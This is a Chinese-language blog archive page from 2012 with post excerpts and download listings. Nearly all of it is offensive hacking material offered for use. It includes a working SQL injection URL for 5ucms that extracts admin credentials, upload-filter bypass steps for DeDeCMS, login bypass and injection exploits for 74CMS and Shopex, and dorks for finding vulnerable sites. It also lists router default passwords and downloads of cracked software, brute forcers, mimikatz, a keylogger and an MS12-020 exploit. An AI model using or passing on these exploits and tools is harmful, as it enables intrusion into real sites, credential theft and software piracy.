2012年07月_fengling132

11月 10月 09月 08月 07月 06月 05月 04月 03月

转载各个不同品牌水星路由默认密码

水星应该不是很多人熟悉,不要以为品牌叫水星,产地就是水星,其实水星是TP-LINK的一个子品牌,专门针对低端主流市场的产品各类路由器默认密码艾玛 701g 192.168.101.1 192.168.0.1 用户名：admin 密码：admin 用户名：SZIM 密码：SZIM艾玛701H 192.168.1.1 10.0.0.2 用户名：admin 密码：epic

2012-07-31 23:24:34 7338

转载免费收录网站的搜索引擎登录口大全

百度搜索网站登录口：http://www.baidu.com/search/url_submit.htmlGoogle网站登录口：http://www.google.com/addurl/?hl=zh-CN&continue=/addurlGoogle新闻网站内容http://www.google.com/support/news_pub/bin/request.py?contact_ty

2012-07-31 10:37:09 12002

转载 CDlinux下安装驱动使用make命令command not found

哪个版本的CDLINUX啊，去官网下你对应版本的devel-cdl.md模块复制到CDlinux/extra/目录下，重起机器后就有make命令了。make: command not foundsudo apt-get install make gcc

2012-07-25 21:45:40 5750

转载 BT5 U盘制作方法

bt5u盘制作教程有人又在反映做起来不能用在做个教程吧退出后在U盘里面有个名叫 syslinux.cfg用记事本打开修改成和下面的一样就可以了进到BIOS选HDD启动default vesamenu.c32prompt 0menu title http://hi.baidu.com/175714101timeout 600

2012-07-24 10:49:20 1972

转载 Backtrack5安装ThinkPad RTL8192ce-SE无线网卡驱动,同样适用其他Linux发行版本

是使用Unetbootin工具将Backtrack5安装到SD卡上的。但是我发识别无线网卡，网上找了好久，终于解决了这个问题，现在将处理的过程分享给大家。此方法同样可解决Linux系统下ThinkPad 系列或其他使用RTL无线网卡的机器。1.首先介绍以下我机器的环境：OS:Backtrack 5(基于Ubuntu Linux 10.04)CPU:Intel(R) Core(TM) i

2012-07-24 01:42:49 1774

转载 BT5无线蹭网利器光盘版

BT5（BT4）全称Back Track four，这是一个linux环境的便携系统，可以放到U盘或者盘中启动，对本身硬盘没有影响，无需在本地安装。是圈内非常著名的黑客攻击平台，是一个封装好的Linux操作系统，内置大量的网络安全检测工具以及黑客破解软件等。BT3~4因可以方便的破解无线网络而出名，其中内置的spoonwep是一个非常悍的图形化破解wep无线网络密的工具。 B

2012-07-23 01:25:50 1442

转载教你用笔记本破解无线路由器密码

最近很多人问我怎么破解WiFi密码…看来大家都对免费的东西比较有兴趣。要么也可能是我太招摇了…囧…好吧，我就写篇小小的教程，看完后，你应该能够破解大部分无线路由器密码了，写这个教程也是为了加强大家对无线网络安全性的重视，后面也有简单的防破解的办法。好了，正式开始。首先，你需要的工具：软件：① BackTrack 3（简称BT3）BT3有光盘版，硬盘版还有U盘版

2012-07-23 01:02:32 1992 1

原创 2012黑客工具包.zip

直接给地址"http://kuai.xunlei.com/d/JOAJQTOCBFMK黑鹰http://kuai.xunlei.com/d/JUDWMFMQOQNZ中国黑客组织(khttp://kuai.xunlei.com/d/JKBZMGWIHRYF吾爱小生工具包http://kuai.xunlei.com/d/JQXOQRZEUVTJ华夏:http://kuai.xunlei

2012-07-21 22:01:46 2580 2

转载 webshell迅雷提权

F4技术小组 www.f4ms.netwebshell地址http://192.168.197.130/dama.asp迅雷默认安装文件夹盘符\Program Files\Thunder Network\Thunder盘符\Program Files\Thunder要修改的两个文件进入Program文件夹getAllurl.htm

2012-07-21 18:46:44 1062

转载 sql注入词&语法

sql注入关键词脚本小子必看inurl:asp?id=inurl:Article_Print.asp?EnCompHonorBig.asp?id=随便加个数字showproduct.asp?id=随便加个数字 inurl:ManageLogin.aspEnCompHonorBig.asp?id= 随便加个数字inurl: (asp?=数字) inurl: (php?=数

2012-07-14 16:07:21 13485

转载 “2012年全国职业院校技能大赛”高职组信息安全管理与评估赛项获奖名单

http://www.chinaskills.org/news-nr.asp?anclassid=165&nclassid=741&id=2304发布时间：2012-7-10 来源：ChinaSkills 访问次数：318“2012年全国职业院校技能大赛”高职组信息安全管理与评估赛项获奖名单一等奖序号

2012-07-14 10:28:51 34735

转载 mssql脱库脚本aspx版本

protected void Button1_Click(object sender, EventArgs e){string serverIP=txtServerIP.Text;string database=txtDatabase.Text;string user=txtUser.Text;string pass=txtPass.Text;string tableNam

2012-07-13 15:59:17 1603

转载 SQL Server数据库常用的T-SQL命令

=============================================================================================================sqlserver显示数据库和表及列名select * from master.dbo.sysdatabases where dbid>4//显示所有

2012-07-13 15:25:47 806

翻译 ActiveX component can't create object这个错误怎么解决

当运行知羽相册软件、知羽平面软件，双击快捷方式后出现“Run-time error '429' AcriveX component can't create object.”的错误提示时，可能是由于以下原因造成：1、“dao350.dll”文件没注册成功。2、没有安装SQL Server。请分别手工注册 dao350.dll 和 scrrun.dll 两个文件。方法是在“开始”——

2012-07-13 12:47:51 42604 1

转载 Backtrack5实战系列视频教程

BackTrack是一套专业的计算机安全检测的Linux操作系统，简称BT。目前最新与最好用版本是BT5.它可以用来破解WEP，WPA/WPA2加密方式的无线网络也不在话下，当然前提是需要有足够强大的密码字典文件。如果你仅仅用来破解WIFI，那么就大材小用了，集成了众多安全工具的BT不仅仅在破解WIFI上功能强悍，还有如弱点扫描工具Nessus，渗透平台MSF， Sniff工具W

2012-07-10 11:12:13 1332

转载 burpsuite_pro_v1.4.07破解版

升级版。 burpsuite_pro_v1.4.07 最新破解版分享给有需要的朋友。解压密码:www.freebuf.com下载地址原文转自：http://www.freebuf.com/tools/4771.html本文来源于独自等待博客：http://www.waitalone.cn/ 原文地址：http://www.waitalone.cn/post/burpsu

2012-07-10 11:03:55 1718

转载 php打包程序

[php] view plaincopy "Content-Type" content="text/html; charset=gb2312"> PHP整站打包程序-By DoDo "myform" method="post" action=""> ini_set('memory

2012-07-10 09:12:19 742

转载用IIS防止mdb数据库被下载

如何防止mdb数据库被下载？本文讨论的是在服务器端禁止mdb格式数据库文件被下载，而不是在数据库中加入防下载表，将数据库名改为含#号的asp、asa等后缀格式。　　下面以IIS6.0为例说明如何在服务器端设置禁止下载mdb数据库。新建一记事本文件，里面不要填写任何内容，将文件名改为NoDownload.dll，拷贝到C:\Windows\System32\（Win2000为C:\WinNT\

2012-07-07 22:03:07 700

转载 74CMS 人才系统 v3.2 注射 & 全版本通杀进后台

因为某站用的这个系统旁站也无从下手所以就下了份源码来读整套程序过滤的还是比较全面的不过所有版本都是GBK编码是他的硬伤但是基本上字符串入库的时候作者都使用了iconv来把提交过来的数据编码转换成utf8所以利用宽字符注入就没办法了但是过滤完善仅限3.2版本之前最新的3.2版本plus目录多了几个文件不知道是不是换了程序员了… 先上两个白痴注入吧~注

2012-07-03 15:34:33 2415

转载解决Fckeditor删除所有上传页面如何上传

首先,你得确定下Fckeditor的版本。 /FCKeditor/editor/dialog/fck_about.html 其次,你确定下以下几个上传页面是否真的被删除了呢? /FCKeditor/editor/filemanager/browser/default/browser.html/FCKeditor/editor/filemana

2012-07-03 12:54:08 533

转载渗透内网方法之巧用代理

代理在入侵里的作用—–妙用代理，渗透内网　　一、踩点　　主机: http://www.webshell.cc　　OS:Windows 2000 + IIS 5.0 + MSSQL　　端口:80 21i　　数据库放内网，IP为 192.168.1.2 ,更重要的是内网数据库可以上网.　　首页存在注入漏洞，sa登陆.　　注入点:　　 ht

2012-07-03 12:51:56 754

转载自己写的php木马webshell扫描器

因为前端时间服务器被放过所以写了个webshell扫描器呵呵专杀php webshell 不管大马还是小马包括一句话现在放出代码来 <?php/*+--------------------------------------------------------------------------+| Codz by indexphp Version:0.

2012-07-02 16:08:58 950

转载 K8-MSSQL综合利用工具V1.1 可秒脱百万/千万记录数据

2012-07-02 16:02:08 2187

转载 WindowsXP上安装和运行神器SqlMap的步骤

本文要介绍的是如何在Windows XP上安装和运行SqlMap的安装步骤。在Windows XP上安装和运行SqlMap的步骤……1、首先下载SqlMap 点击下载。2、其次下载用于Windows系统的Python ……点击这里……3、然后安装Python：Python默认安装的路径是“C:\Python”（你也可以修改安装路径，但要记住路径），直接默认安装“下一

2012-07-02 15:35:31 715

转载 SQLmap工具介绍及其使用

这是SEVEN大哥写的！：从黑防上看到他们说是有什么内部的工具，国外的注入工具，python的。想下载看看，结果是vip工具。就从百度上搜索，没有发现。看来在国内还没有流行。就直接去google上搜索去了。结果发现了这个工具。功能非常强大。我以前的想法，这个工具全都实现了。而且功能更强。新一代的强大工具。我还没有时间来得及分析。感兴趣的朋友可以去研究研究。开源又

2012-07-02 15:33:12 624

转载 SQLMAP 注射工具用法

1 。介绍1.1 要求1.2 网应用情节1.3 SQL 射入技术1.4 特点1.5 下载和更新sqlmap1.6 执照2 。用法2.1 帮助2.2 目标URL2.3 目标URL 和verbosity2.4 URL 参量2.5 Google dork2.6 HTTP 方法: 得到或张贴2.7 张贴的数据串2.8 HTTP 曲奇饼倒

2012-07-02 15:24:00 1407

转载 5ucms 最新版 sql 注入漏洞

漏洞EXP↓ /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin放手上很久了，没怎么用。就放出来吧。希望只用于测试。不要恶意利用。

2012-07-02 15:21:15 698

转载织梦cms v6.7最新上传漏洞

file:newname:提交1,必须登陆用户。2,将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。3,newname为上传后的新文件名，扩展名使用大写绕过，如“Php”。

2012-07-02 15:15:57 788

转载 Shopex 4.8.5 SQL Injection Exp

function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") < 0 && url.search("https://") < 0){ url = "http://" + url; } doc

2012-07-02 15:14:05 611

转载 DeDeCMS v5.7最新利用工具[一键暴密码]0day

使用说明：1、输入被检测网站的地址2、请等待，时间取决于你的网络状况，和网站的速度。3、如果网站没有漏洞的话会弹出提示。4、成功的话会弹出一个窗口复制密码去破解就好了。下载地址：DeDeCMS

2012-07-02 15:05:16 4836

转载总结常见网站服务器提权20种思路

1，SER-TU提权（通常是利用SERFTP服务器管理工具，首先要在安装目录下找到INI配置文件，必须具备可写入的权限）2，RADMIN提权（大家并不陌生，我们在扫描4899空口令后，同样需要他来连接）3，PCANYWHRER提权（也是远程客户端软件，下载安装目录的CIF文件进行破解）4，SAM提权（SAM系统帐户，通常需要下载临时存放的SAM文件，然后进行HASH破解）5，NC提

2012-07-01 00:06:54 2289

全国省市区的plist文件<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>北京市</key> <dict> <key>0</key> <dict> <key>北京市</key> <array> <string>东城区</string> <string>西城区</string> <string>朝阳区</string> <string>丰台区</string> <string>石景山区</string> <string>海淀区</string> <string>门头沟区</string> <string>房山区</string> <string>通州区</string> <string>顺义区</string> <string>昌平区</string> <string>大兴区</string> <string>怀柔区</string> <string>平谷区</string> <string>密云县</string> <string>延庆县</string> </array> </dict> </dict> </dict> </plist>

2015-01-12

VMware vSphere 4.1的BT种子

VMware vSphere 4.1BT的种子。1、在ESxserver中点击性能选项卡，可以很清楚的看到整个server或者单独的guest os对cpu、内存、network 、系统的资源占用情况。还可以为每个虚拟机分配保留的资源，也可以限制其最大使用的资源。 2、在vmware workstation中，当建立多个虚拟机，并且需要对外发布服务的时候，就会造成异常。而在ESX Server中，把每个网卡都虚拟成了一个多达64口的交换机，即使多个虚拟机共享一个网卡对外发布服务，都没有任何的问题。 3、支持虚拟机的自动启动。当host主机需要reboot 时，主机启动后，可以设定主机上的虚拟机自动启动，而且可以采用延时启动的方式，比如间隔120s，逐个启动虚拟机，启动哪几个虚拟机也是可以设定的。 4、支持时间任务计划。可以设定在指定的时间执行任务，比如打开或者关闭虚拟机。一个可行的方案就是在早上8点打开某服务的虚拟机，而在下午六点半下班以后将虚拟机进入suspend状态。 5、支持多用户管理，可以添加多个用户帐号，进行ESX Server的管理，可以设定不同的用户权限，比如是admin还是power user ，比如是否可以建立虚拟机，是否具有关闭电源的权利等等。 6、支持虚拟机模板技术，可以将一个虚拟机clone 或者 convert 为一个 template ,比如，我们将一个RHEL的guest os转化为模板，当需要新建一台虚拟机的时候，只需要从这个template deploy出来即可。模板和虚拟机的转化是双向的。也可以将模板重新转化回虚拟机，这样的好处是可以保证模板永远是最新最使用的。 7、支持虚拟机的迁移，可以将一个虚拟机从一台ESx server转移到另外一台ESX server 。如果使用了Vmotion ，这个转移过程还可以是自动的，根据一些设定好的条件，如资源占用情况，是否宕机等等。当然，这种转移需要共享存储的支持。 8、可以通过VC控制台对存储空间进行管理，比如上传或者下载文件，在控制台界面中，默认的布局是host and cluster ,可以选择datastore，就可以看到存储界面了，可以常看其状态并进行文件管理。 9、ESX是支持存储的，无论是SAN还是NAS，可以用openfiler或者freenas来模仿SAN或者NAS。在ESX中，需要配置一个网卡作为vmkernel和存储通讯，还要在openfiler或者freenas中设置安全措施，或者允许的ip地址访问等等。 10、支持snapshot ，很方便的功能，对虚拟机做了snapshot后，任何时候都可以恢复到做snapshot时的系统状态，支持多个snapshot，相当于guest os有了一个时光机器。

2012-11-11

Kiwi Syslog v8.3.28 Crack 专业版破解

2012-11-05

Python标准库中文版

1. 核心模块 o 1.1. 介绍 o 1.2. _ _builtin_ _ 模块 o 1.3. exceptions 模块 o 1.4. os 模块 o 1.5. os.path 模块 o 1.6. stat 模块 o 1.7. string 模块 o 1.8. re 模块 o 1.9. math 模块 o 1.10. cmath 模块 o 1.11. operator 模块

2012-11-02

SqlmapNoPy.rar

下载：http://down.f4ck.net/soft/SqlmapNoPy.rar 一个是由论坛核心成员ettack制作的汉化版的sqlmap。

2012-08-01

sqlmap_cn.tar

分享2个修改版的sqlmap。一个是由论坛核心成员uing07制作的win下的不需要py环境就能执行的sqlmap。

2012-08-01

phpv9.rar

phpcms V9最新漏洞利用工具工具作者：B0y

2012-07-25

Findpassword

Findpassword找到系统密码，2003密码

2012-07-15

mdb解包.rar

mdb解包,解压webshell打包的文件

2012-07-10

74cmsexp_t00ls.rar

so… 直接向 admin_login.php?act=do_login 构造以下POST语句就能直接进后台了~~ 当然前提你得有后台路径:

2012-07-03

sqlmap-add8352.tar.gz

sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。

2012-07-02

K8MSSQL.rar

程序:K8-MSSQL综合利用工具V1.0 语言:VS2010 C# (.NET Framework v2.0) 作者:拉登哥哥 QQ:396890445 更新历史: 2012-06-09 [+] BCP导出txt(可导出整个表) 秒脱百万/千万记录测试导出CSDN 640W数据仅需10-15秒 [+] 导出htm格式(可导出指定列) 只适合100W以下记录 [+] 修复空格(数据库名/表名/列名)不能导出的bug [+] 修复纯数字列名/字段不能的bug [+] 显示当前要导出表的记录总数

2012-07-02

sqlmap-0.9.zip

2012-07-02

sqlmap-add8352

2012-07-02

struts工具_95096

struts工具_95096漏洞利用工具，你们懂的。

2012-06-29

iis批量扫描工具

iis.rar 批量扫描工具好久就想写了,今天有点时间,就把以前的笔记整理一下主要是针对shell 有 net work 权限可以跨目录写入文件但是不能浏览找不到目标站的绝对路径的一个技巧! 呵呵找到用户名和绝对路径的关系一个简单的批处理即可把VirtualHost几百个网站(一般是 180)全部写入一句话

2012-05-08

mimikatz_trunk.zip

密码嗅探技术，最近很流行的工具，很强大。

2012-05-03

mimikatz_trunk (2).zip

windows密码嗅探，很好的工具啦。

2012-05-03

Webkey_1.91.apk

通过电脑以WIFI无线方式登录Android安卓手机，就像Linux的SSH远程控制一样，可以在电脑浏览器中打开手机屏幕，并执行手机程序(打电话、发短信、上网等)，还可以查看、操作SDCard的文件，获得GPS位置，截取手机屏幕，手机和电脑直接聊天等等。能实现这一功能的就是Webkey这款软件。

2012-05-02

logkeys-0.1.1a.tar.gz

linux下的键盘记录分类：工具 2012-05-02 15:00 0人阅读评论(0) 收藏编辑删除安装： wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz tar -xf logkeys-0.1.XX.tar.gz cd logkeys-0.1.XX ./configure make make check make install 使用： logkeys -s -u -o log.txt

2012-05-02

DUBrute_2.1

DUBrute_2.1，2.1的版本比2.0的版本稳定性要强，效果要更好些，以前用2.0进行爆破2003的系统可以成功，但是xp就成功不了，但是2.1的版本破解xp的3389效果也相当不错

2012-04-03

ms12-020压缩包

　　本次Windows RDP服务的这个漏洞也使得攻击者控制用户服务器或者造成蓝屏 3月19日消息，Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020，微软公司把该漏洞级别定为最高级-严重(Critical)，攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限

2012-04-03

DUBrute_v2.0_rc3.rar

DUBrute_v2.0_rc3.rar,rc2的升级版，效果不错，专门破解3389的超强工具，工具压缩包里含有3389端口的扫描程序，此程序可批量扫描3389，破解3389

2012-04-02

Recton v2.6免杀加强版.exe

Recton v2.6免杀加强版局域网在获得用户名密码的前提下，可以进行开启telnet，进程，种植等

2012-04-02

libssh2-1.2.7.tar.gz

安装libssh2-1.2.7 将libssh2-1.2.7.tar.gz拷贝到/tmp/目录下，解压为libssh2-1.2.7并进入该目录: 2.1 ./configure 2.2 make 2.3 make install

2012-04-01

medusa-2.0.tar.gz

渗透linux环境的网络，口令破解是必不可少的。接下来介绍一款优秀的口令破解工具，medusa-2.0.tar.gz 将字典(如brute.dic, p.dic)拷贝到目录/tmp/后，进入/tmp/目录，键入medusa可以看到其它帮助信息，根据帮助信息可以开始破解SSH.。e.g., (假设我们要破解的目标IP为192.168.10.126) [root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh

2012-04-01

RGSupplicant4.10_1026.rar

锐捷客户端破解版可以使用代理等业务不会掉线这是农林大学的一个人做的

2012-03-30

利客联盟phpshell-2.0.rar

用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。

2012-03-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人